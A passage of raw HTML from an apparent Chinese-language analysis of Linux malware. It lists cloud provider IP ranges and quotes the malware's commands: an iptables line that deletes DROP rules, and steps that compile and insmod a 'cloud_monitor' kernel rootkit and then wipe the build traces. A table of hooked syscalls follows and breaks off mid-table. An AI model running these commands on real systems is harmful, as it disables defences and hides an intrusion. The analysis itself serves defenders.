style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">DigitalOcean</span></span></p></td></tr><tr><td data-colwidth="453" width="453" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">67.207.0.0/16</span></span></p></td><td data-colwidth="398" width="398" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">DigitalOcean</span></span></p></td></tr><tr><td data-colwidth="453" width="453" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">46.101.0.0/16</span></span></p></td><td data-colwidth="398" width="398" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">DigitalOcean</span></span></p></td></tr><tr><td data-colwidth="453" width="453" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">157.245.0.0/16</span></span></p></td><td data-colwidth="398" width="398" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">DigitalOcean</span></span></p></td></tr><tr><td data-colwidth="453" width="453" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">146.190.0.0/16</span></span></p></td><td data-colwidth="398" width="398" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">DigitalOcean</span></span></p></td></tr><tr><td data-colwidth="453" width="453" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">144.126.0.0/16</span></span></p></td><td data-colwidth="398" width="398" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">DigitalOcean</span></span></p></td></tr><tr><td data-colwidth="453" width="453" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">167.172.0.0/16</span></span></p></td><td data-colwidth="398" width="398" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">DigitalOcean</span></span></p></td></tr><tr><td data-colwidth="453" width="453" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">172.104.0.0/16</span></span></p></td><td data-colwidth="398" width="398" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Linode</span></span></p></td></tr><tr><td data-colwidth="453" width="453" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">172.105.0.0/16</span></span></p></td><td data-colwidth="398" width="398" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Linode</span></span></p></td></tr></tbody></table><p style="margin-left: 0pt;border-width: 1pt;border-style: solid;border-color: rgb(231, 234, 237);padding: 4pt 2pt 3pt;background: rgb(248, 248, 248);" data-pm-slice="0 0 []"><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">iptables </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-L</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> INPUT </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-v</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-n</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> | </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">grep</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> &lt;IP&gt; | </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">awk</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#39;{print $8}&#39;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> | xargs </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-rL1</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> iptables </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-D</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> INPUT </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-j</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> DROP </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-s</span></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">部署 LKM Rootkit (cloud_monitor)</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这是最危险的组件。脚本内嵌完整 C 语言内核模块源码, 在目标机器上现场编译并加载。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong><span leaf=""><span textstyle="" style="font-weight: bold;">编译流程</span></span></strong></p><p style="margin-left: 0pt;border-width: 1pt;border-style: solid;border-color: rgb(231, 234, 237);padding: 4pt 2pt 3pt;background: rgb(248, 248, 248);" data-pm-slice="0 0 []"><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">mkdir</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /tmp/b</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 写入 cloud_monitor.h (宏定义)</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 写入 cloud_monitor.c (约 400 行内核模块代码)</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 写入 Makefile</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">make</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-C</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /lib/modules/</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,153,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">`uname -r`</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">/build </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,255);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">M</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">/tmp/b modules</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">insmod /tmp/b/cloud_monitor.ko</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">rm</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-rf</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /tmp/b     </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 清理编译痕迹</span></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">被挂钩的系统调用</span></span></p><table style="border-collapse:collapse;width:426.1000pt;border:none;mso-border-left-alt:0.5000pt solid rgb(223,226,229);mso-border-top-alt:0.5000pt solid rgb(223,226,229);mso-border-right-alt:0.5000pt solid rgb(223,226,229);mso-border-bottom-alt:0.5000pt solid rgb(223,226,229);mso-padding-alt:0.0000pt 0.0000pt 0.0000pt 0.0000pt;"><tbody><tr><td data-colwidth="229" width="229" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium;border-style: solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">系统调用</span></font></span></b></p></td><td data-colwidth="622" width="622" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">挂钩后行为</span></font></span></b></p></td></tr><tr><td data-colwidth="229" width="229" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt;border-style: solid;border-color: rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">getdents</span></span></p></td><td data-colwidth="622" width="622" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">过滤目录列表中的隐藏条目</span></font></span></p></td></tr><tr><td data-colwidth="229" width="229" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">getdents64</span></span></p></td><td data-colwidth="622" width="622" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">同上</span></font><span leaf=""> (64位版本)</span></span></p></td></tr><tr><td data-colwidth="229" width="229" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">kill</span></span></p></td><td data-colwidth="622" width="622" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p 